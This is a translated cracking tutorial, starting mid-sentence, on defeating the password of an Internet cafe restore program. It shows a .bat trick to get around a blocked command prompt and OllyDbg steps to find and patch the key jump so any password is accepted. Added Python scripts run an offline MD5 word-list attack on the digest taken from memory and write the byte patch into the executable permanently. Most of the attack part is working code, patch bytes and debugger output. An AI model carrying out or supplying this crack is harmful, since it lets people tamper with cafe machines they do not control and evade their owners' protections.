Author: NetKi1l [ESST] China Cracking Alliance [edevil-Soul Security Team] (http://www.cncracker.com)
Tools used in this article:
OD (OllyDbg), a Ring3 (user-mode) dynamic debugger, 32-bit
…wait) after the assumer.exe process has finished, you can create a new one. Create a new text file, type cmd.exe into it, and save it as cmd.bat; this gets around the restriction on running CMD. If CMD is still restricted, search Baidu for the relevant information; I will not go into details here. Otherwise, once CMD is running, type wmic and then process to list the processes, and you can see that the program lives under drive C (figure 1).
Some people will ask how to find out the name of the flash-recovery process. Open Task Manager to look (figure 2):
right-click the program's entry and choose "Go to process".
Open the directory containing the executable; you can check it for a packer yourself (I will not check here). Now run the program to see what the interface looks like. It sits in the tray in the lower right corner of the desktop; right-click the icon (figure 3).
Click "Restore Settings" and the dialog in figure 4 appears.
We enter the wrong password Netki1l to bring up the error message.
Now load the program in OD (figure 5).
The code is clean, so there is no strong packer; we can run it directly.
After the program runs, we try to find the key strings, for example prompts such as "Sorry, incorrect password" and "password correct". If such strings can be found, the crack is not far away. Reload the program: press ALT+F2 to close the current process and CTRL+F2 to reload it. Once the debugging session is loaded again, right-click in the disassembly window (upper left) and choose "Ultra String Reference"; ASCII and UNICODE options pop up, and generally ASCII gives results. The strings found are all network connection addresses (too many to copy out here). It looks as if no key strings can be found; is it packed after all? Regardless, first press F9 to let the program run. (My current Internet cafe uses the Pubwin charging system, which monitors all processes, so a prompt pops up when OD runs; if yours is also Pubwin, this has no effect on debugging the program.) After it is running, press ALT+E or click the E icon on the toolbar (this shows the loaded modules), select the program's EXE in the list and double-click it (figure 6).
Double-clicking takes us back to the disassembly window, where we search the ASCII strings again. (Searching the module's strings after the program has run is very effective against ordinary packers, because by then the code has been unpacked in memory; try it yourself.) This time we find many useful strings:
004F7E3A  mov ecx, RecoverS.004F7EAC  ; Prompt
004F7F2D  mov edx, RecoverS.004F8110  ; Change password
004F7FA8  mov ecx, RecoverS.004F811C  ; Error
004F7FAD  mov edx, RecoverS.004F8124  ; Modification failed: the passwords do not match!
004F8016  mov ecx, RecoverS.004F811C  ; Error
004F801B  mov edx, RecoverS.004F8144  ; Original password wrong, modification failed!
004F8094  mov ecx, RecoverS.004F815C  ; Prompt
004F8099  mov edx, RecoverS.004F8164  ; Password modified!
004F80AE  mov ecx, RecoverS.004F811C  ; Error
004F80B3  mov edx, RecoverS.004F8174  ; Password change failed!
004F91E6  mov ecx, RecoverS.004F924C  ; Error
004F91EB  mov edx, RecoverS.004F9254  ; Incorrect password, login failed!
004F9281  mov ecx, RecoverS.004F9298  ; Prompt
004F9286  mov edx, RecoverS.004F92A0  ; Operation successful!
Double-click the line at 004F91EB to land in the disassembly:
004F91E2  75 1D          jnz short RecoverS.004F9201   ; the key jump of the whole crack: taken (skipping the error block) when the password matches
004F91E4  6A 10          push 10
004F91E6  B9 4C924F00    mov ecx, RecoverS.004F924C    ; Error
004F91EB  BA 54924F00    mov edx, RecoverS.004F9254    ; Incorrect password, login failed!
004F91F0  A1 24445000    mov eax, dword ptr ds:[504424]
004F91F5  8B00           mov eax, dword ptr ds:[eax]
004F91F7  E8 887BF7FF    call RecoverS.00470D84
004F91FC  E8 67BCF0FF    call RecoverS.00404E68
004F9201  EB 0E          jmp short RecoverS.004F9211
Set a breakpoint with F2 at 004F91E2 in the disassembly window, then enter the wrong password Netki1l; the program breaks there.
In the stack we can see that the password is compared as a 32-character MD5 hex digest:
0155FC28 03B6DFC8 ASCII "d5ee4d63f409239f5018d683b332178a"
0155FC2C 03B7E128 ASCII "Netki1l"
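The following Python model of the check, written for this article as an added example and not taken from RecoverS, shows what the stack dump implies: if the program compares an unsalted MD5 digest of the typed password with a stored digest, the digest visible in memory can be attacked offline with a word list, with no patching at all. The hashing scheme is an assumption drawn from the 32-character value on the stack, and STORED_DIGEST is a constructed value (the MD5 of "abc"), not the digest from the page.

```python
"""Model of the password check observed at 004F91E2, as an added example.

Assumed (not stated on the page): the program MD5-hashes the typed password
without a salt and compares the lowercase hex digest with a stored digest.
STORED_DIGEST below is a constructed value (MD5 of "abc"), not the digest
shown on the page's stack dump.
"""
import hashlib
from typing import Iterable, Optional

STORED_DIGEST = "900150983cd24fb0d6963f7d28e17f72"   # constructed: md5("abc")


def md5_hex(password: str) -> str:
    """32-character lowercase MD5 hex digest, the form seen on the stack."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def check_password(entered: str, stored_digest: str = STORED_DIGEST) -> str:
    """Emulate the compare followed by the jnz at 004F91E2: the jump skips the
    error block when the digests match, otherwise the error is shown."""
    if md5_hex(entered) == stored_digest.lower():
        return "operation successful!"            # jnz taken -> 004F9201 -> success path
    return "incorrect password, login failed!"    # falls through into the error block


def guess_offline(stored_digest: str, candidates: Iterable[str]) -> Optional[str]:
    """Because the stored digest is unsalted MD5 and sits in plain view in
    memory, it can be tested against a word list without touching the program."""
    target = stored_digest.lower()
    for candidate in candidates:
        if md5_hex(candidate) == target:
            return candidate
    return None


if __name__ == "__main__":
    print(check_password("Netki1l"))                                    # wrong password
    print(guess_offline(STORED_DIGEST, ["password", "123456", "abc"]))  # recovers "abc"
```

Copy the 32-character digest out of OD's stack window into STORED_DIGEST and feed guess_offline a real word list; a match gives the actual password, which works on an unpatched copy of the program.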
With the program stopped at the breakpoint, change the bytes 75 1D to 74 1D and run; the result is shown in figure 7. Note that because the jnz jumps over the error block, 74 (jz) inverts the check: Netki1l is now accepted, but the real password would be rejected. To accept any password unconditionally, change 75 to EB (jmp short) instead; replacing the two bytes with 90 90 (nop) would always fall into the error branch.
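OD's edit only changes the bytes in memory. To make the patch permanent you must translate the virtual address 004F91E2 to a file offset through the PE section table, confirm the original bytes are really 75 1D before writing, and pick the replacement with the branch direction in mind. The Python below is an added example written for this article, not code from RecoverS or from the author; its image base, section table and file image are constructed for illustration. Only the jump semantics taken from the listing (the jnz jumps over the error block) and the x86 encodings 75 = jnz, 74 = jz, EB = jmp short, 90 = nop are fixed facts.

```python
"""Making the 004F91E2 patch permanent in the file, as an added example.

The section table, image base and file image below are constructed for
illustration and are not taken from RecoverS. Not assumed: the jnz at
004F91E2 jumps over the error block (see the listing), and the encodings
75 = jnz rel8, 74 = jz rel8, EB = jmp rel8, 90 = nop.
"""
from typing import Dict, List, Tuple

JNZ_VA = 0x4F91E2                 # address of the key jump in the listing
IMAGE_BASE = 0x400000             # constructed: the usual base of a 32-bit EXE
# Constructed section table: (VirtualAddress, VirtualSize, PointerToRawData,
# SizeOfRawData), the IMAGE_SECTION_HEADER fields that map a VA to a file offset.
SECTIONS: List[Tuple[int, int, int, int]] = [
    (0x1000,   0x100000, 0x400,    0x100000),   # .text
    (0x101000, 0x2000,   0x100400, 0x2000),     # .data
]


def va_to_file_offset(va: int, image_base: int, sections) -> int:
    """Translate a virtual address (as OD shows it) to an offset in the file."""
    rva = va - image_base
    for vaddr, vsize, raw_ptr, raw_size in sections:
        if vaddr <= rva < vaddr + max(vsize, raw_size):
            delta = rva - vaddr
            if delta >= raw_size:
                raise ValueError("address lies in a part of the section not stored in the file")
            return raw_ptr + delta
    raise ValueError(f"VA {va:#x} is not inside any section")


def patch_bytes(image: bytearray, offset: int, expected: bytes, new: bytes) -> None:
    """Patch only after confirming the original bytes: a mismatch means the
    wrong file, version or offset, and writing blindly would corrupt code."""
    if len(expected) != len(new):
        raise ValueError("patch must not change the length of the instruction")
    actual = bytes(image[offset:offset + len(expected)])
    if actual != expected:
        raise ValueError(f"bytes at {offset:#x} are {actual.hex()}, expected {expected.hex()}")
    image[offset:offset + len(new)] = new


def apply_patch(new: bytes) -> bytes:
    """Build a constructed file image with 75 1D at the jump, patch it, and
    return the bytes now at that location."""
    image = bytearray(0x100400)                      # constructed dummy file image
    off = va_to_file_offset(JNZ_VA, IMAGE_BASE, SECTIONS)
    image[off:off + 2] = b"\x75\x1D"                 # plant the original jnz short
    patch_bytes(image, off, b"\x75\x1D", new)
    return bytes(image[off:off + 2])


def jump_taken(opcode: int, zf: bool) -> bool:
    """Does the 2-byte jump at 004F91E2 transfer to 004F9201 (skipping the
    error block) for this ZF value?"""
    if opcode == 0x75:          # jnz
        return not zf
    if opcode == 0x74:          # jz
        return zf
    if opcode == 0xEB:          # jmp short
        return True
    if opcode == 0x90:          # nop nop: falls through into the error block
        return False
    raise ValueError(f"unexpected opcode {opcode:#x}")


def outcome(patched: bytes) -> Dict[str, bool]:
    """Assumption: in the original code the right password leaves ZF=0 (so the
    jnz is taken and the error is skipped) and a wrong password leaves ZF=1."""
    op = patched[0]
    return {"right_pw_ok": jump_taken(op, zf=False),
            "wrong_pw_ok": jump_taken(op, zf=True)}


if __name__ == "__main__":
    for variant in (b"\x75\x1D", b"\x74\x1D", b"\xEB\x1D", b"\x90\x90"):
        print(variant.hex(), apply_patch(variant).hex(), outcome(variant))
```

Read the real section table from the target's PE header (a PE parser such as pefile gives the same four fields) rather than the constructed one here; the outcome table makes the point from the text concrete: 74 inverts the check, EB accepts everything, and 90 90 locks everyone out.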
I did not reboot to test it; you can test it yourself.
As you can see, Internet cafes still carry many security risks; administrators are expected to maintain and update their security in a timely manner.